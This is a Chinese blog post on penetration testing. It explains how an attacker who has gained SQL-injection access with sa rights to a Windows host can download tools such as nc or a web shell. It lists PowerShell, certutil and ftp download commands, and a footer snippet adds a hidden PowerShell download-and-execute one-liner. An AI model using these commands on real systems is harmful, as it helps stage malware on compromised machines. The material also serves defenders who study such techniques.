Windows下默认远程下载

最新推荐文章于 2024-04-02 17:24:25 发布
最新推荐文章于 2024-04-02 17:24:25 发布
阅读量1.2k 收藏
点赞数
分类专栏: 内网渗透 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weiliang369/article/details/123435756
版权

场景:

在过去我在做某次台湾渗透的过程中遇到了一个sql注入,数据库权限是sa权限,主机在内网无法直接登录,我们需要上传nc或者其他的转发程序将其转发出来,即便不行,我们也需要上传一个shell,但是基于没有后台的情况下,我们只能将希望寄托于sa。

应用:

Powershell

certutil

ftp

Powershell

在windows版本中powershell支持部分linux命令。如curl,所以可以在系统支持powershell的情况下我们可以使用:

curl -O http://xxxxx/1.exe

来进行下载执行。当然还有其他的方式,powershell自带的不止curl一种,我们还可以使用:

Invoke-WebRequest

Invoke-RestMethod

Start-BitsTransfer

System.Net.WebClient

来进行下载,用法分别为:

Invoke-WebRequest -Uri http://xxxxx/1.exe -outfile 1.exe

Invoke-RestMethod -Uri http://xxxxx/1.exe -outfile 1.exe

Start-BitsTransfer -Source "http://xxxx/1.exe" -Destination "1.exe"

(new-object System.Net.WebClient).DownloadFile('http://xxxxx/1.exe', '1.exe'))

Certutil

certutil.exe -urlcache -split -f 指定url 指定路径

我们在上传过程中二进制文件是会出错的,它仅可以将头文件上传,并不可以上传完整的文件。所以在过程中我们同样可以使用certutil对二进制文件进行编码转换。

certutil.exe -encode 文件路径+文件名 转换后文件名字.txt

解码的过程使用:

certutil.exe -decode 文件路径+文件名 转换后文件名

加解密后保存路径为同一路径。

有时候我们无法使用http的时候我们可以优先选择使用ftp,首先我们需要在公网架设一个ftp,然后使用命令语法将ftp的配置写入。

配置内容为:

open 127.0.0.1  //打开ftp
username   //账号
password    //密码
get 1.exe d:\1.exe    //下载文件到指定目录
bye         //退出

然后使用ftp -s:文件名  执行该ftp配置文件即可。

  

weiliang369
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Windows服务器修改远程桌面默认端口过程图示
09-29
主要介绍了Windows服务器修改远程桌面默认端口过程图示,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
powershell 远程下载并执行
weixin_30338743的博客
09-14 4564
远程下载文件到本地并执行cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://127.0.0.1:8089','notepad.exe');start-process notep...
命令行/终端下载指令大全
m0_58606546的博客
11-17 1724
一:Linux ###Wget 这款工具功能很丰富,可以充当某种功能完备的GUI下载管理器,它拥有一款理想的下载管理器所需要的所有功能,比如它可以恢复下载,可以下载多个文件,出现某个连接问题后,可以重新尝试下载,你甚至可以管理最大的下载带宽。 直接下载 wget http://www.sample-videos.com/video/mp4/big.mp4 后台下载 wget -b http://www.sample-videos.com/video/mp4/big.mp4 如果互联网连接出现中断,
WindowsWindows下载使用wget命令
wzk4869的博客
05-07 5023
WindowsWindows下载使用wget命令
Windows下载执行命令大全
闵行小鱼塘
08-04 5962
转载的执行命令大全
Windows下载使用wget命令
qq_44986029的博客
12-16 4475
Windows下载wget
windows 使用powershell中自带的工具(如wget,WebClient等)下载文件
热门推荐
noblaker的博客
04-12 1万+
系统:win10 powershell 版本:5.1(在终端用$psversiontable查看) windows的powershell中也有跟linux中同名的wget文件下载工具,只不过powershell中的wget是Invoke-WebRequest命令的别名: # 利用get-alias命令: PS D:\> Get-Alias wget # 输出: CommandType Name Ve.
Windows和Linux实现远程桌面连接
09-14
Windows和Linux实现远程桌面连接】是指通过网络在一台计算机上操作另一台计算机的桌面环境。这在系统管理员和远程协作场景中非常常见。本文主要讲述了如何在Windows和Linux之间建立这种连接。 对于Windows远程...
windows服务器远程桌面
07-24
接着,需要配置防火墙规则以允许远程桌面连接,确保3389端口开放,这是默认的远程桌面端口。如果需要更安全的连接,也可以考虑更改此端口。 远程桌面协议(RDP)是实现这一功能的技术基础。RDP提供了加密的安全连接...
windows远程桌面ubuntu
10-07
4. **开始连接**:在Windows上打开远程桌面客户端,输入Ubuntu的IP地址,选择连接模块为vnc-any(因为Xrdp使用VNC协议与Windows RDP客户端通信),保持默认端口5900不变,输入设置的密码,就可以成功建立远程桌面...
windows指令
01-27
windows指令查询手册,包括常用的Windows操作指令。 1. appwiz.cpl:程序和功能 2. calc:启动计算器 3. certmgr.msc:证书管理实用程序 4. charmap:启动字符映射表 5. chkdsk.exe:Chkdsk 磁盘检查(管理员身份运行命令 提示符) 6. cleanmgr: 打开磁盘清理工具 7. cliconfg:SQL SERVER 客户端网络实用工具 8. cmstp:连接管理器配置文件安装程序 9. cmd.exe:CMD 命令提示符 ...... ......
WINDOWS中CMD命令大全下载
11-02
WINDOWS中CMD命令大全下载。平时进行操作可以参考一下 。
Windows-git安装包下载
07-18
确保从可信赖的源下载安装包,并根据自己的需求进行适当的配置,就能顺利地在Windows环境下使用Git进行开发工作。在使用过程中,不断熟悉Git的命令和工作流,将会极大地提高你的开发效率和团队协作能力。
应急响应实战笔记——权限维持篇:⑤ Windows命令行文件下载方式汇总
最新发布
君逍遥o
04-02 1422
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。一般情况下攻击者使用FTP上传文件需要很多交互的步骤,下面这个 bash脚本,考虑到了交互的情况,可以直接执行并不会产生交互动作。第一种,远程下载文件到本地,然后再执行;*本文收集了15种常见的文件下载执行的方式,并结合具体案例**,让我们一起来看看是怎么实现的吧。
windows 弹shell_Windows文件下载执行的15种姿势
weixin_39706127的博客
11-19 293
当我们通过Web渗透获取了一个Shell,而且目标主机是Windows,我们该怎么去下载后门文件到目标主机上执行呢?一般来说,实现Windows文件下载执行的方式不外乎以下几种方式。第一种,远程下载文件到本地,然后再执行;第二种,远程下载执行,执行过程没有二进制文件落地,这种方式已然成为后门文件下载执行的首要方式。另外呢,只要你所在服务器的环境支持,你也可以通过任何一门语言来实现它,这种...
Bypass | Windows中的文件下载方法
good good study
09-04 990
有时候我们可以执行命令,我们想上线cs,但是主机上存在杀软,使用一般的方式都会被拦截,此时如何下载文件进行上线了?
Windows系统中curl和wget命令下载说明
YY007H的博客
11-23 2187
当需要在命令行中发送 HTTP 请求时,常用的工具有curl和wget。它们可以帮助你下载文件,发送 POST 或 GET 请求,以及检查网页内容等。curlcurl是一个功能强大的命令行工具,支持多种协议(例如 HTTP、HTTPS、FTP 等)。它可以用来发送各种类型的请求,包括 GET、POST、PUT 等,并支持自定义 HTTP 头、认证等。curl还可以传递数据、上传文件,以及进行身份验证等操作。使用curl可以通过命令行直接输出请求的内容。。wgetwget。
使用Windows的Powershell下载文件
weixin_33744854的博客
11-02 4160
例如要将文件:http://www.51.cto.com/download/datainfo.cfg                 http://www.51.cto.com/download/ABK/full.ABK                  http://www.51.cto.com/download/FIN/full.FIN                  http://www....
window下载远程压缩包(Dos命令下载三行命令)
weixin_39921970的博客
11-10 1307
Dos 3行同步远程文件压缩包,centos常用wget获取远程文件,windows也可以用相同的思路。
Windows远程用户默认
07-28
Windows远程用户默认使用的是3389端口进行连接。\[2\]如果你想修改默认端口,可以按照以下步骤进行操作:首先,打开注册表编辑器,然后找到"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weiliang369

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值